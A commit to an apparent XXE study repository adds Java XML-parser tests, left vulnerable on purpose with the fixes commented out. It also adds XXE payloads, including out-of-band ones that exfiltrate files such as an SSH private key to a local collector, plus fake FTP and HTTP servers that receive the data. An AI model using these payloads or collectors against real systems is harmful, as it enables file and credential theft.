feat:java xml解析导致的xxe学习

Author: xuanyh

src/main/java/com/threedr3am/bug/server/FtpServer.java

@@ -0,0 +1,77 @@
+package com.threedr3am.bug.server;
+
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.OutputStream;
+import java.io.PrintWriter;
+import java.net.ServerSocket;
+import java.net.Socket;
+import java.util.concurrent.ExecutorService;
+import java.util.concurrent.Executors;
+
+/**
+ * 用于xxe oob多行文件内容时使用，参考xxe-ftp-server.rb
+ * 链接：https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb
+ *
+ * @author xuanyh
+ */
+public class FtpServer {
+
+  private static final int PORT = 2121;
+
+  private static ExecutorService executorService = Executors.newFixedThreadPool(4);
+
+  public static void main(String[] args) {
+    try {
+      ServerSocket serverSocket = new ServerSocket(PORT);
+      for (;;) {
+        Socket socket = serverSocket.accept();
+        executorService.execute(() -> {
+          try {
+            handle(socket.getInputStream(), socket.getOutputStream());
+            socket.close();
+          } catch (IOException e) {
+            e.printStackTrace();
+          }
+        });
+      }
+
+    } catch (IOException e) {
+      e.printStackTrace();
+    }
+  }
+
+  private static void handle(InputStream inputStream, OutputStream outputStream) {
+    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
+    PrintWriter printWriter = new PrintWriter(outputStream, true);
+    System.out.println("FTP. New client connected");
+    printWriter.println("220 xxe-ftp-server");
+    for (;;) {
+      String line = null;
+      try {
+        line = bufferedReader.readLine();
+        System.out.println("< " + line);
+      } catch (IOException e) {
+        e.printStackTrace();
+        System.out.println("FTP. Connection closed");
+        break;
+      }
+      if (line.toUpperCase().contains("LIST")) {
+        printWriter.println("drwxrwxrwx 1 owner group          1 Feb 21 04:37 test");
+        printWriter.println("150 Opening BINARY mode data connection for /bin/ls");
+        printWriter.println("226 Transfer complete.");
+      } else if (line.toUpperCase().contains("USER")) {
+        printWriter.println("331 password please - version check");
+      } else if (line.toUpperCase().contains("PORT")) {
+        System.out.println("! PORT received");
+        System.out.println("> 200 PORT command ok");
+        printWriter.println("200 PORT command ok");
+      } else {
+        System.out.println("> 230 more data please!");
+        printWriter.println("230 more data please!");
+      }
+    }
+  }
+}

src/main/java/com/threedr3am/bug/server/HTTPServer.java

@@ -0,0 +1,80 @@
+package com.threedr3am.bug.server;
+
+import com.sun.net.httpserver.Headers;
+import com.sun.net.httpserver.HttpExchange;
+import com.sun.net.httpserver.HttpHandler;
+import com.sun.net.httpserver.HttpServer;
+import com.sun.net.httpserver.spi.HttpServerProvider;
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.io.OutputStream;
+import java.net.InetSocketAddress;
+import java.util.Iterator;
+import java.util.List;
+import java.util.Set;
+import org.apache.commons.lang3.StringUtils;
+
+/**
+ * 解析http协议，输出http请求体
+ *
+ * @author xuanyh
+ */
+public class HTTPServer {
+
+  private static final int PORT = 8080;
+
+  public static void main(String[] args) throws IOException {
+    HttpServerProvider provider = HttpServerProvider.provider();
+    HttpServer httpserver = provider.createHttpServer(new InetSocketAddress(PORT), 100);
+    //监听端口8080,
+
+    httpserver.createContext("/", new RestGetHandler());
+    httpserver.setExecutor(null);
+    httpserver.start();
+    System.out.println("server started");
+  }
+
+  static class RestGetHandler implements HttpHandler {
+
+    @Override
+    public void handle(HttpExchange he) throws IOException {
+      String requestMethod = he.getRequestMethod();
+      System.out.println(requestMethod + " " + he.getRequestURI().getPath() + (
+          StringUtils.isEmpty(he.getRequestURI().getRawQuery()) ? ""
+              : "?" + he.getRequestURI().getRawQuery()) + " " + he.getProtocol());
+      if (requestMethod.equalsIgnoreCase("GET")) {
+        Headers responseHeaders = he.getResponseHeaders();
+        responseHeaders.set("Content-Type", "application/json");
+
+        he.sendResponseHeaders(200, 0);
+        // parse request
+        OutputStream responseBody = he.getResponseBody();
+        Headers requestHeaders = he.getRequestHeaders();
+        Set<String> keySet = requestHeaders.keySet();
+        Iterator<String> iter = keySet.iterator();
+
+        while (iter.hasNext()) {
+          String key = iter.next();
+          List values = requestHeaders.get(key);
+          String s = key + ": " + values.toString();
+          System.out.println(s);
+        }
+        System.out.println();
+        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(he.getRequestBody()));
+        StringBuilder stringBuilder = new StringBuilder();
+        String line;
+        for (;(line = bufferedReader.readLine()) != null;) {
+          stringBuilder.append(line);
+        }
+        System.out.println(stringBuilder.toString());
+
+        // send response
+        String response = "";
+        responseBody.write(response.getBytes());
+        responseBody.close();
+      }
+    }
+  }
+
+}

src/main/java/com/threedr3am/bug/xxe/DocumentBuilderFactory_DOMTest.java

@@ -0,0 +1,46 @@
+package com.threedr3am.bug.xxe;
+
+import java.io.ByteArrayInputStream;
+import java.io.IOException;
+import javax.xml.parsers.DocumentBuilder;
+import javax.xml.parsers.DocumentBuilderFactory;
+import javax.xml.parsers.ParserConfigurationException;
+import org.w3c.dom.Document;
+import org.xml.sax.SAXException;
+
+/**
+ * DOM方式 - DocumentBuilderFactory
+ *
+ * @author xuanyh
+ */
+public class DocumentBuilderFactory_DOMTest {
+
+  public static void main(String[] args)
+      throws IOException, ParserConfigurationException, SAXException {
+    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
+
+    //todo 存在xxe漏洞
+    DocumentBuilder builder = dbf.newDocumentBuilder();
+
+    String FEATURE = null;
+    FEATURE = "http://javax.xml.XMLConstants/feature/secure-processing";
+    dbf.setFeature(FEATURE, true);
+    FEATURE = "http://apache.org/xml/features/disallow-doctype-decl";
+    dbf.setFeature(FEATURE, true);
+    FEATURE = "http://xml.org/sax/features/external-parameter-entities";
+    dbf.setFeature(FEATURE, false);
+    FEATURE = "http://xml.org/sax/features/external-general-entities";
+    dbf.setFeature(FEATURE, false);
+    FEATURE = "http://apache.org/xml/features/nonvalidating/load-external-dtd";
+    dbf.setFeature(FEATURE, false);
+    dbf.setXIncludeAware(false);
+    dbf.setExpandEntityReferences(false);
+
+    //todo 修复需要把这行代码放在此处 DocumentBuilder builder = dbf.newDocumentBuilder();
+//    DocumentBuilder builder = dbf.newDocumentBuilder();
+
+    ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes());
+    Document d = builder.parse(byteArrayInputStream);
+    System.out.println(d.getDocumentElement().getTextContent());
+  }
+}

src/main/java/com/threedr3am/bug/xxe/Features.java

@@ -0,0 +1,40 @@
+package com.threedr3am.bug.xxe;
+
+/**
+ * 各种feature
+ *
+ * @author xuanyh
+ */
+public interface Features {
+
+  String FEATURE = "http://apache.org/xml/features/disallow-doctype-decl";
+
+  /**
+   * 是否允许使用通用实体
+   */
+  String FEATURE2 = "http://xml.org/sax/features/external-general-entities";
+
+  /**
+   * 是否允许使用参数实体
+   */
+  String FEATURE3 = "http://xml.org/sax/features/external-parameter-entities";
+
+  /**
+   * 是否允许加载外部DTD实体
+   */
+  String FEATURE4 = "http://apache.org/xml/features/nonvalidating/load-external-dtd";
+
+  /**
+   * 是否启用安全性处理
+   */
+  String FEATURE_SECURE_PROCESSING = "http://javax.xml.XMLConstants/feature/secure-processing";
+
+  /**
+   * 是否允许使用外部DTD实体
+   */
+  String ACCESS_EXTERNAL_DTD = "http://javax.xml.XMLConstants/property/accessExternalDTD";
+
+  String ACCESS_EXTERNAL_SCHEMA = "http://javax.xml.XMLConstants/property/accessExternalSchema";
+
+  String ACCESS_EXTERNAL_STYLESHEET = "http://javax.xml.XMLConstants/property/accessExternalStylesheet";
+}

src/main/java/com/threedr3am/bug/xxe/Payloads.java

@@ -0,0 +1,55 @@
+package com.threedr3am.bug.xxe;
+
+/**
+ * 各种xml xxe payload
+ *
+ * @author xuanyh
+ */
+public interface Payloads {
+
+  /**
+   * 有回显的payload xml
+   *
+   * 读取/tmp/aaa文件内容
+   */
+  String FEEDBACK =
+      "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
+    + "<!DOCTYPE root ["
+    + "        <!ENTITY xxe SYSTEM \"file:///tmp/aaa\">"
+    + "        ]>"
+    + "<root>&xxe;</root>";
+
+  /**
+   * 没有回显，只能带出去的payload xml，读取文件单行
+   *
+   * 读取/tmp/aaa文件内容
+   * 127.0.0.1:80的http web服务器存放xxe.dtd文件：
+   * <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:23232?file=%file;' >">
+   * 监听23232端口
+   */
+  String NO_FEEDBACK_SINGLE_LINE =
+      "<?xml version=\"1.0\" ?>"
+    + "<!DOCTYPE note ["
+    + "   <!ENTITY % file SYSTEM \"file:///tmp/aaa\">"
+    + "   <!ENTITY % remote SYSTEM \"http://127.0.0.1:80/xxe.dtd\">"
+    + "   %remote;%all;"
+    + "]>"
+    + "<root>&send;</root>";
+
+  /**
+   * 没有回显，只能带出去的payload xml，读取文件多行
+   *
+   * 读取/tmp/aaa文件内容
+   * 127.0.0.1:80的http web服务器存放xxe.dtd文件：
+   * <!ENTITY % all "<!ENTITY send SYSTEM 'ftp://127.0.0.1:23232?file=%file;' >">
+   * 监听23232端口
+   */
+  String NO_FEEDBACK_MULT_LINE =
+      "<?xml version=\"1.0\" ?>"
+    + "<!DOCTYPE note ["
+    + "   <!ENTITY % file SYSTEM \"file:///Users/xuanyh/.ssh/id_rsa\">"
+    + "   <!ENTITY % remote SYSTEM \"http://127.0.0.1:80/xxe_mult.dtd\">"
+    + "   %remote;%all;"
+    + "]>"
+    + "<root>&send;</root>";
+}

src/main/java/com/threedr3am/bug/xxe/SAXBuilder_JDOMTest.java

@@ -0,0 +1,41 @@
+package com.threedr3am.bug.xxe;
+
+import java.io.ByteArrayInputStream;
+import java.io.IOException;
+import java.util.List;
+import org.jdom.Content;
+import org.jdom.Document;
+import org.jdom.Element;
+import org.jdom.JDOMException;
+import org.jdom.input.SAXBuilder;
+
+/**
+ * JDOM方式 - SAXBuilder
+ *
+ * @author xuanyh
+ */
+public class SAXBuilder_JDOMTest {
+
+  public static void main(String[] args) throws JDOMException, IOException {
+    //todo 存在xxe漏洞
+    SAXBuilder saxBuilder = new SAXBuilder();
+
+    //todo 修复方式1
+//    SAXBuilder saxBuilder = new SAXBuilder(true);
+
+    //todo 修复方式2
+//    SAXBuilder saxBuilder = new SAXBuilder();
+//    saxBuilder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+//    saxBuilder.setFeature("http://xml.org/sax/features/external-general-entities", false);
+//    saxBuilder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+//    saxBuilder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
+
+    ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes());
+    Document document = saxBuilder.build(byteArrayInputStream);
+    Element element = document.getRootElement();
+    List<Content> contents = element.getContent();
+    for (Content content : contents) {
+      System.out.println(content.getValue());
+    }
+  }
+}